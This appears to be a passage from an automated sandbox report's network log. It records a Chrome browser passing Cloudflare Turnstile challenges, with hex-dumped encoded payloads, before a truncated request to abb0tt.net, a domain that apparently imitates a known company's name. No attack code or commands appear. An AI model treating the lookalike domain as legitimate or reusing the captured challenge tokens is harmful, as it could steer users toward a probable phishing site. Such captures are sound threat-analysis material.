                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 47 77 6f 57 4e 76 37 44 45 71 71 79 37 73 35 37 48 73 38 79 36 31 63 53 75 30 4c 2f 58 73 64 33 5a 32 62 61 37 30 74 72 46 33 65 66 6b 71 63 50 64 35 4e 48 6c 30 64 48 56 31 75 50 76 37 39 4c 45 32 74 72 53 39 4f 43 35 76 76 66 73 76 64 72 36 36 4e 58 61 41 76 58 61 34 75 6a 77 42 63 6b 4e 44 50 7a 66 39 67 37 51 39 76 73 50 32 41 6f 4d 47 50 45 65 47 67 50 68 48 67 4d 41 48 4f 45 63 46 50 6f 5a 4b 79 66 70 38 53 51 56 4b 51 38 52 49 42 67 44 4c 42 67 78 48 7a 6f 70 45 7a 59 30 4f 67 48 39 4a 43 59 71 4e 69 70 43 48 79 52 45 52 54 49 50 53 55 73 79 43 45 39 4c 4a 53 74 47 50 42 5a 4e 56 45 6c 5a 54 57 42 45 48 6b 64 5a 52 46 31 64 61 55 77 6c 50 32 4e 5a 54 33 4a 71 61 6b 64 4d 57 47 38 31 4e 32 68 5a 57 6e 4a 65 63 7a 30 30 65 48 68 6d 68 6f 52 39 52 6c
                                                                                                                                                                                                                                      Data Ascii: GwoWNv7DEqqy7s57Hs8y61cSu0L/Xsd3Z2ba70trF3efkqcPd5NHl0dHV1uPv79LE2trS9OC5vvfsvdr66NXaAvXa4ujwBckNDPzf9g7Q9vsP2AoMGPEeGgPhHgMAHOEcFPoZKyfp8SQVKQ8RIBgDLBgxHzopEzY0OgH9JCYqNipCHyRERTIPSUsyCE9LJStGPBZNVElZTWBEHkdZRF1daUwlP2NZT3JqakdMWG81N2hZWnJecz00eHhmhoR9Rl
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 67 37 4c 49 70 70 2b 33 7a 63 2b 57 79 64 48 45 75 38 7a 54 73 64 58 50 32 4b 43 58 31 4e 33 4a 36 64 6a 69 31 4d 50 63 35 4f 65 75 34 65 6d 77 70 2b 62 73 79 73 66 74 38 62 69 32 36 50 53 38 38 65 7a 34 77 64 50 32 2f 41 48 6e 2b 77 45 46 33 2f 30 46 38 51 62 38 43 4f 62 72 42 51 38 42 37 2f 73 53 32 65 73 50 46 67 6e 33 44 68 72 32 37 78 6f 65 49 51 41 56 49 50 33 71 48 79 59 53 4a 69 49 71 48 52 51 6e 4c 6a 44 79 4a 54 45 30 37 79 6f 31 4f 50 34 78 4f 79 30 59 4d 54 34 61 2b 7a 70 42 43 55 34 77 52 69 49 50 52 6b 70 4d 43 45 5a 4f 51 53 78 46 55 68 6c 53 54 6c 56 4a 51 45 35 61 52 6c 5a 53 58 54 6f 6e 57 57 41 2f 50 45 39 6e 57 55 68 66 61 55 59 76 61 47 35 78 54 47 5a 78 5a 56 78 71 64 6e 6c 51 64 48 70 42 51 33 4e 2b 67 45 4e 2b 67 56 39 63 66 49 52
                                                                                                                                                                                                                                      Data Ascii: g7LIpp+3zc+WydHEu8zTsdXP2KCX1N3J6dji1MPc5Oeu4emwp+bsysft8bi26PS88ez4wdP2/AHn+wEF3/0F8Qb8CObrBQ8B7/sS2esPFgn3Dhr27xoeIQAVIP3qHyYSJiIqHRQnLjDyJTE07yo1OP4xOy0YMT4a+zpBCU4wRiIPRkpMCEZOQSxFUhlSTlVJQE5aRlZSXTonWWA/PE9nWUhfaUYvaG5xTGZxZVxqdnlQdHpBQ3N+gEN+gV9cfIR
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 72 50 51 73 62 43 75 7a 64 47 34 6e 4c 71 34 32 73 44 52 77 73 66 67 33 4c 6e 69 31 4d 50 6b 78 4b 6e 44 36 63 79 78 30 2b 54 74 38 4f 65 30 32 2f 54 77 7a 66 62 6f 31 2f 50 37 31 75 4c 50 2b 74 62 66 41 75 54 4a 36 75 51 4a 78 77 54 4d 37 67 33 56 35 75 7a 50 43 68 6a 31 42 51 34 53 2b 4e 7a 36 37 68 73 42 41 41 4d 42 45 51 66 33 48 2f 67 6d 49 67 6f 6f 43 79 51 73 45 54 49 71 45 54 45 71 4c 68 62 34 46 77 38 33 48 54 49 66 48 69 30 6a 47 44 73 56 42 7a 34 6e 52 43 64 41 53 43 30 36 52 69 77 39 52 54 4d 30 53 6c 4a 4b 4d 53 34 33 55 46 67 39 48 31 5a 41 56 6c 35 57 50 54 74 61 58 6b 68 65 5a 6c 31 46 51 6b 74 6b 62 46 46 71 61 6c 52 71 63 6d 6c 52 54 32 35 79 58 48 4a 36 64 46 6c 57 58 33 69 41 5a 58 70 2b 61 48 36 47 67 47 56 6a 67 6f 5a 77 68 6f 36 48
                                                                                                                                                                                                                                      Data Ascii: rPQsbCuzdG4nLq42sDRwsfg3Lni1MPkxKnD6cyx0+Tt8Oe02/Twzfbo1/P71uLP+tbfAuTJ6uQJxwTM7g3V5uzPChj1BQ4S+Nz67hsBAAMBEQf3H/gmIgooCyQsETIqETEqLhb4Fw83HTIfHi0jGDsVBz4nRCdASC06Riw9RTM0SlJKMS43UFg9H1ZAVl5WPTtaXkheZl1FQktkbFFqalRqcmlRT25yXHJ6dFlWX3iAZXp+aH6GgGVjgoZwho6H


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      25192.168.2.1649750104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:39 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                      cf-chl-out: oV6WNCrDGPKMTRvPvQOUJtKNWJLYeiuJnZs=$/1C8kUfbw2IH5Lxy
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd880af7c336-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      26192.168.2.1649751104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 34791
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      CF-Challenge: vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC16384OUTData Raw: 76 5f 38 66 65 35 63 64 36 35 36 62 36 36 34 33 30 39 3d 72 38 6d 7a 39 55 74 58 66 55 66 64 6d 64 65 74 24 73 6d 7a 55 6d 73 53 64 48 77 54 77 54 7a 55 46 74 41 77 46 52 24 61 74 52 66 74 31 77 5a 77 41 32 53 55 25 32 62 77 51 7a 6b 50 6a 7a 77 2d 6d 68 43 77 34 61 55 31 77 37 44 61 7a 77 62 7a 73 65 77 50 39 4f 74 6d 77 67 7a 41 36 77 7a 7a 77 63 66 6d 57 34 7a 55 56 2b 77 45 6d 74 54 77 41 4f 61 46 76 77 74 75 4d 48 77 61 46 74 75 58 71 6c 6a 7a 74 78 79 7a 63 74 59 68 57 51 4c 59 7a 79 77 41 2d 61 77 74 6a 43 79 73 63 77 73 46 77 6b 57 61 74 6b 79 73 46 43 41 7a 37 38 53 71 39 38 4f 31 48 77 55 48 53 38 44 78 39 6d 68 71 53 77 63 4f 66 39 37 35 64 56 57 61 77 6e 67 44 63 43 48 7a 65 37 74 74 53 43 6d 70 51 48 4e 6a 24 77 5a 69 52 32 24 71 54 78 44 4b
                                                                                                                                                                                                                                      Data Ascii: v_8fe5cd656b664309=r8mz9UtXfUfdmdet$smzUmsSdHwTwTzUFtAwFR$atRft1wZwA2SU%2bwQzkPjzw-mhCw4aU1w7DazwbzsewP9OtmwgzA6wzzwcfmW4zUV+wEmtTwAOaFvwtuMHwaFtuXqljztxyzctYhWQLYzywA-awtjCyscwsFwkWatkysFCAz78Sq98O1HwUHS8Dx9mhqSwcOf975dVWawngDcCHze7ttSCmpQHNj$wZiR2$qTxDK
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC16384OUTData Raw: 77 4b 78 6d 2d 4e 55 53 77 2b 7a 6b 7a 36 77 74 42 41 53 77 77 61 45 53 75 59 56 61 41 49 4d 79 6f 37 77 41 37 76 63 77 71 77 74 61 77 70 77 5a 36 37 6a 77 64 77 31 7a 73 6c 7a 38 77 73 7a 73 6a 6c 48 77 74 7a 37 71 72 2d 77 69 7a 73 36 74 31 77 37 78 53 37 74 71 77 58 61 41 53 77 64 66 35 61 64 36 77 79 77 42 61 73 38 77 4d 77 61 46 73 65 77 66 77 69 46 41 6a 77 68 69 71 46 41 58 74 75 77 46 57 74 56 77 4b 61 6c 7a 73 4b 77 2d 77 37 46 64 46 7a 46 77 69 46 77 68 71 52 46 31 35 41 6d 77 32 77 65 77 77 61 77 46 77 45 55 6e 48 76 75 38 74 77 6e 36 77 37 77 74 58 37 6d 77 57 77 59 63 64 38 64 67 72 74 77 64 46 7a 73 46 37 61 45 63 55 71 77 69 46 73 53 55 57 77 44 46 74 56 77 54 6d 61 7a 6e 36 77 33 77 53 66 37 6d 77 37 77 58 5a 64 77 77 48 7a 71 61 56 34 74
                                                                                                                                                                                                                                      Data Ascii: wKxm-NUSw+zkz6wtBASwwaESuYVaAIMyo7wA7vcwqwtawpwZ67jwdw1zslz8wszsjlHwtz7qr-wizs6t1w7xS7tqwXaASwdf5ad6wywBas8wMwaFsewfwiFAjwhiqFAXtuwFWtVwKalzsKw-w7FdFzFwiFwhqRF15Amw2wewwawFwEUnHvu8twn6w7wtX7mwWwYcd8dgrtwdFzsF7aEcUqwiFsSUWwDFtVwTmazn6w3wSf7mw7wXZdwwHzqaV4t
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC2023OUTData Raw: 51 61 49 59 4e 66 77 73 46 71 74 70 35 31 4e 6d 63 68 74 66 74 37 46 48 4d 45 36 54 6a 4d 75 7a 64 59 77 69 4e 4a 39 4a 50 42 2d 4c 54 48 37 4c 54 67 4c 4d 77 73 58 74 31 53 31 7a 73 78 39 49 7a 6d 56 24 4e 74 6e 36 42 73 4c 44 59 5a 7a 69 39 42 77 77 76 77 74 30 4a 42 48 56 77 53 75 4b 43 65 45 51 53 24 24 57 77 75 67 76 7a 73 6b 46 5a 6d 4c 38 64 66 77 48 7a 36 4b 55 48 52 62 4c 53 6d 41 53 62 70 4e 33 7a 55 68 39 6b 77 67 62 56 4f 4a 6d 79 42 77 6e 48 76 43 4c 2b 77 45 72 30 69 38 66 61 74 49 52 75 65 53 77 4d 6d 77 5a 77 6d 53 6e 75 4a 46 77 63 53 6e 6e 50 6c 57 69 46 74 34 24 66 34 59 61 64 33 77 75 63 5a 6f 37 36 77 51 61 41 61 55 24 46 51 61 72 76 42 59 77 57 65 51 34 45 4a 72 35 7a 37 39 43 65 31 7a 6a 2b 46 37 31 52 35 46 6f 77 77 63 77 35 77 4c
                                                                                                                                                                                                                                      Data Ascii: QaIYNfwsFqtp51Nmchtft7FHME6TjMuzdYwiNJ9JPB-LTH7LTgLMwsXt1S1zsx9IzmV$Ntn6BsLDYZzi9Bwwvwt0JBHVwSuKCeEQS$$WwugvzskFZmL8dfwHz6KUHRbLSmASbpN3zUh9kwgbVOJmyBwnHvCL+wEr0i8fatIRueSwMmwZwmSnuJFwcSnnPlWiFt4$f4Yad3wucZo76wQaAaU$FQarvBYwWeQ4EJr5z79Ce1zj+F71R5Fowwcw5wL
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 4544
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cf-chl-out-s: QZxHPXSn659jsYyB4DCo42MsxaAk+kkhrWzHhvc0KbZ1LYENwHGfBiMpPC87C60I2Xgx4luzidFCA7AvwiSHiN+PrMRID1yW3GUrIhkaf5q83zBM+ub2jAM1cDkGh3cdyRSUAZACZHZUjYqJi8xolhAfidZ3OUv1732aP/eNj7IXMgNJPtJD+fIkBVC2eD4bfs7B712idmNawYWq4a/GS2/4OUB+05lKY8YCz0zQXzehLvGOwGDgRE9YTBsbLUkltcWyloYUA/ojmgULi9TcCPVRcDte+vQMQXq64g1ARRjPPCG2ZSL10TBf7ePSLrxirXVlWVZ+taPFhUgf2GGGg8E0JUhKsj9XupGMXaYl6UlEhAHA4nESPFCnuUMl+JSoaz8tQwNY37m79UT54TRXzo8Y41b5WJ01l518FSWpcq/2FFgFZ5gqQOSJ3USMR6xDGvegf3dz/+mDBb2UZBhHjJcCDl4c9L2Z1JXbGV1MwZGnGsM5etkxS+IkxnwHcZk3S70GmZ7Bv8ZuVScTzotZeELqCvE+hcUHs+RjxbGIlj7aEAtfalLIelJy/zy09NTuoyWjQImwhwLeHsMWPTYuXV3aYgCPjj5CeHd029joVYSq7cYm3ScU48w+OkmiEECaNfHvuN4ndDswzdAuz8NMZFTGGim4IJm9mnrB/CQveZfnQFyFTiu4yZvR3q+ro95WEombQmmNR5d9U9enSujddms/AwJTLzyF+xJQUAlhlkY6yTHa4WkjPG08SgoY+VjaB691Pi+VNiCYFyC+2PJi4aaqhdCJV4v4TJfqcS2jvCGj6xE6wJpfYn9p4uPTVd8KRQIqKfzXeZOVGoXiuimpUXDWV7gzIFiPr4i4/7fshvTAmlttgJoESy9Qj9r19jiHdoZdqiTHIb30x+wZTWdBdVeQ458BD/tv/YBEEsfQfFfszi/8BCerZYiBnU9AaPZZCpMmui5hYQoD0KiTFXSFYudfCYQy6vVweojAZn6IMjM=$IOmQ3 [TRUNCATED]
                                                                                                                                                                                                                                      cf-chl-out: M0VpqVDsR8ahdwZ7rNoVZfS+Brb8kIwVST+69Y63Ej28Q+n/o3VhPxBHLtPS3609cW1tbf65ydm9jnJCVRDVzs/Aio51F24YxwIB86T1cw==$LauuHaISDgYePrQp
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd9d6deab9c5-EWR
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC1345INData Raw: 6a 5a 4b 43 5a 59 56 50 63 5a 46 64 56 33 47 62 58 35 56 63 6e 4b 4b 61 59 49 43 70 67 57 52 33 72 48 47 42 61 5a 46 2f 69 59 75 5a 6c 61 32 4b 70 4a 79 2b 6c 71 2b 73 6b 71 75 30 76 49 4f 34 75 4d 43 48 71 4d 43 74 78 72 66 4a 75 70 2f 41 77 4c 2b 6d 7a 73 37 52 74 4e 72 57 31 71 6a 4f 7a 37 53 76 34 4e 33 69 75 61 62 61 79 4f 47 6b 32 72 7a 6f 70 62 2b 71 78 4d 71 71 34 2b 79 2f 72 76 65 31 30 2f 32 30 2f 4e 6d 35 75 72 37 78 37 75 4c 54 34 2b 62 58 30 2f 50 32 33 4e 7a 38 35 2b 6e 6c 44 50 50 7a 44 67 54 34 39 51 6f 61 2b 78 48 61 47 67 73 58 37 43 45 50 38 50 6a 64 2f 52 73 48 34 51 6a 36 2f 41 63 4f 42 53 73 74 41 65 76 73 4a 43 4d 59 4f 67 6f 4b 2b 78 51 2b 4c 78 34 61 47 2f 34 77 4e 52 67 63 4f 77 45 72 51 77 64 4a 50 41 67 67 43 79 59 2f 53 6c 4d
                                                                                                                                                                                                                                      Data Ascii: jZKCZYVPcZFdV3GbX5VcnKKaYICpgWR3rHGBaZF/iYuZla2KpJy+lq+skqu0vIO4uMCHqMCtxrfJup/AwL+mzs7RtNrW1qjOz7Sv4N3iuabayOGk2rzopb+qxMqq4+y/rve10/20/Nm5ur7x7uLT4+bX0/P23Nz85+nlDPPzDgT49Qoa+xHaGgsX7CEP8Pjd/RsH4Qj6/AcOBSstAevsJCMYOgoK+xQ+Lx4aG/4wNRgcOwErQwdJPAggCyY/SlM
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC1369INData Raw: 6f 53 4b 56 34 56 77 69 6f 36 4b 61 46 39 53 68 31 52 37 57 70 4e 70 57 34 2b 54 6d 58 4e 31 6d 4a 71 41 63 4a 53 68 6e 71 4b 58 6f 36 5a 33 6e 4a 4b 75 6e 4b 57 74 61 4b 71 53 71 34 79 70 73 33 65 62 64 35 6c 38 76 6f 32 66 66 4b 36 7a 75 4b 69 79 74 4b 62 46 6d 4b 43 72 79 4c 44 44 72 38 75 49 71 63 69 57 79 61 37 52 75 62 7a 48 31 38 6d 69 6e 4c 32 66 33 73 6a 57 79 73 75 72 78 4f 54 75 77 4f 43 39 70 4f 62 6c 36 2b 72 4e 35 66 44 59 36 65 7a 64 2b 76 62 72 30 50 4c 33 2b 38 49 43 33 76 6a 6f 41 73 4c 34 32 66 6e 42 42 2b 49 50 45 4f 37 39 31 73 37 79 45 76 67 53 39 64 6b 50 48 76 6b 61 47 79 49 41 34 50 50 5a 41 79 41 41 36 42 72 6f 42 4f 34 4b 2f 65 37 76 4c 41 49 6e 4a 53 37 32 42 51 63 70 4e 68 55 4b 47 68 4d 64 4e 6a 67 59 4d 30 55 35 42 53 41 4c
                                                                                                                                                                                                                                      Data Ascii: oSKV4Vwio6KaF9Sh1R7WpNpW4+TmXN1mJqAcJShnqKXo6Z3nJKunKWtaKqSq4yps3ebd5l8vo2ffK6zuKiytKbFmKCryLDDr8uIqciWya7RubzH18minL2f3sjWysurxOTuwOC9pObl6+rN5fDY6ezd+vbr0PL3+8IC3vjoAsL42fnBB+IPEO791s7yEvgS9dkPHvkaGyIA4PPZAyAA6BroBO4K/e7vLAInJS72BQcpNhUKGhMdNjgYM0U5BSAL
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC1369INData Raw: 35 6e 53 32 53 58 62 32 31 6c 64 70 70 77 6d 33 68 57 57 6e 71 54 70 49 46 69 65 59 4a 30 59 6e 79 49 65 58 75 48 71 57 36 4d 69 36 65 71 62 4b 61 75 74 72 57 53 63 70 57 37 71 37 75 56 73 35 47 41 6d 61 47 76 68 6f 6d 68 70 38 33 49 71 61 72 4e 70 61 58 52 31 4a 58 44 71 35 54 43 74 71 58 61 74 61 32 57 32 36 47 74 72 70 76 67 78 63 61 66 76 64 50 44 71 61 4f 6f 34 2f 48 74 77 61 6d 76 74 4f 66 55 77 4c 6e 46 31 73 54 34 79 66 48 37 32 4f 48 37 76 2f 44 6c 35 41 6a 63 35 64 54 43 2b 2b 44 50 45 51 2f 74 36 39 7a 4c 36 51 67 55 41 2f 6b 64 32 50 50 39 48 4e 2f 68 2b 52 48 6a 31 78 51 57 38 42 54 39 4b 43 6f 44 2b 66 76 72 4c 44 41 45 38 41 73 47 39 76 63 52 2b 44 67 37 45 6a 67 75 51 6a 77 64 42 41 41 62 51 41 41 48 43 51 45 67 53 44 6f 2f 43 67 77 38 43
                                                                                                                                                                                                                                      Data Ascii: 5nS2SXb21ldppwm3hWWnqTpIFieYJ0YnyIeXuHqW6Mi6eqbKautrWScpW7q7uVs5GAmaGvhomhp83IqarNpaXR1JXDq5TCtqXata2W26GtrpvgxcafvdPDqaOo4/HtwamvtOfUwLnF1sT4yfH72OH7v/Dl5Ajc5dTC++DPEQ/t69zL6QgUA/kd2PP9HN/h+RHj1xQW8BT9KCoD+fvrLDAE8AsG9vcR+Dg7EjguQjwdBAAbQAAHCQEgSDo/Cgw8C
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC461INData Raw: 54 64 31 74 30 6e 35 64 6f 64 5a 39 37 62 48 70 31 6d 6d 4f 6d 65 47 46 72 71 4b 39 6c 72 59 57 63 65 36 2b 49 6f 36 31 75 70 34 6d 4b 65 48 79 7a 71 72 75 72 67 5a 61 42 68 4c 75 36 77 35 79 41 6d 59 71 4e 72 49 48 52 70 62 75 65 30 63 47 31 31 70 65 77 32 38 58 63 79 61 79 58 6d 71 6e 66 75 35 71 38 78 61 65 77 77 4f 76 42 6f 36 50 76 77 2f 48 46 38 38 71 71 38 38 6d 32 72 74 44 56 30 37 4c 36 32 64 4d 43 32 4f 48 61 75 39 72 56 78 67 72 52 31 65 54 43 43 77 33 59 32 50 76 51 36 63 73 55 36 65 33 4f 7a 78 7a 52 35 41 76 59 30 64 63 50 32 4e 76 73 2f 4f 44 39 33 67 45 47 36 69 34 72 4c 66 72 6d 43 76 30 4c 36 79 45 4c 41 41 77 36 45 78 4d 52 38 2f 34 76 45 54 78 43 47 68 34 69 4f 6a 6f 6c 4b 67 73 44 42 44 38 63 51 30 63 50 48 46 4a 4b 54 69 52 5a 51 79
                                                                                                                                                                                                                                      Data Ascii: Td1t0n5dodZ97bHp1mmOmeGFrqK9lrYWce6+Io61up4mKeHyzqrurgZaBhLu6w5yAmYqNrIHRpbue0cG11pew28XcyayXmqnfu5q8xaewwOvBo6Pvw/HF88qq88m2rtDV07L62dMC2OHau9rVxgrR1eTCCw3Y2PvQ6csU6e3OzxzR5AvY0dcP2Nvs/OD93gEG6i4rLfrmCv0L6yELAAw6ExMR8/4vETxCGh4iOjolKgsDBD8cQ0cPHFJKTiRZQy


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      27192.168.2.1649752104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:43 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                      cf-chl-out: SYYgvhwZkRj9UE4/Zcbs802PYhKOZShsetI=$8vuSKRBqss08FdF6
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cda1fe9bc407-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      28192.168.2.1649735165.140.202.2354436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:46 UTC2498OUTGET /?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH- [TRUNCATED]
                                                                                                                                                                                                                                      Host: abb0tt.net
                                                                                                                                                                                                                                      Connection: keep-alive
